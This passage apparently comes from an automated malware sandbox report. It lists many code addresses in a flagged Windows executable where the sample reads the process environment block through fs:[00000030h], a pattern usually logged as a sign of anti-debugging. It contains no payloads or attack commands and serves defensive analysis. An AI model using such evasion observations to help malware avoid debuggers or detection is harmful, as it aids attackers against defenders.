          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_0141A830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_0141A830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_0141A830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_014B18CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_0148B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_0148B8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_0148B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_0148B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_0148B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_0148B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_0141B8E4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_0141B8E4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_014028FD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_014028FD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_014028FD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_013F9080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_013F3880 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_013F3880 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_01473884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_01473884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_013F58EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_013F40E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_013F40E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_013F40E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_014220A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_014220A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_014220A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_014220A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_014220A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_014220A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_014278A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_014278A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_014278A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_014278A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_014278A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_014278A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_014278A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_014278A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_014278A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_013F78D6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_013F78D6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_013F78D6 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_014390AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_014028AE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_014028AE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_014028AE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_014028AE mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_014028AE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_014028AE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_0142F0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_0142F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_0142F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_013F70C0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_013F70C0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_014C8B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_01423B5A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_01423B5A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_01423B5A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_01423B5A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_01486365 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_01486365 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_01486365 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_0140F370 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_0140F370 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_0140F370 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_01423B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_01423B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_0141A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_0141A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_0141A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_0141A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_0141A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_0141A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_0141A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_0141A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_0141A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_0141A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_0141A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_0141A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_0141A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_0141A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_0141A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_0141A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_0141A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_0141A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_0141A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_0141A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_0141A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_014B131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_013FDB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_013FF358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_013FDB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_014753CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_014753CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_014203E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_014203E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_014203E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_014203E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_014203E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_014203E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_0141DBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_014A23E3 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_014A23E3 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_014A23E3 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_013F4B94 mov edi, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_014B138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_0149EB8A mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_0149EB8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_0149EB8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_0149EB8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_014AD380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_01401B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_01401B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_0142B390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_01422397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_013F1BE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_014B1BA8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_014C5BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_01424BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_01424BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_01424BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_014C9BBE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_014C8BB6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_013F8239 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_013F8239 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_013F8239 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_014B1A5F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_014BEA55 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_01484257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_013F4A20 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_013F4A20 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_013FAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_013FAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_014AB260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_014AB260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_01435A69 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_01435A69 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_01435A69 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_014C8A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_013F5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_013F5210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_013F5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_013F5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_0143927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_0140BA00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_0140BA00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_0140BA00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_0140BA00 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_0140BA00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_0140BA00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_0140BA00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_0140BA00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_0140BA00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_0140BA00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_0140BA00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_0140BA00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_0140BA00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_0140BA00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_01408A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_01413A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_014BAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_014BAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_014B1229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_0141A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_0141A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_0141A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_0141A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_0141A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_0141A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_0141A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_0141A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_0141A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_01434A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_01434A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_013F9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_013F9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_013F9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_013F9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_01422ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_014C8ADD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_013F52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.7e26e87ab642008d.exeCode function: 1_2_013F52A5 mov eax, dword ptr fs:[00000030h]
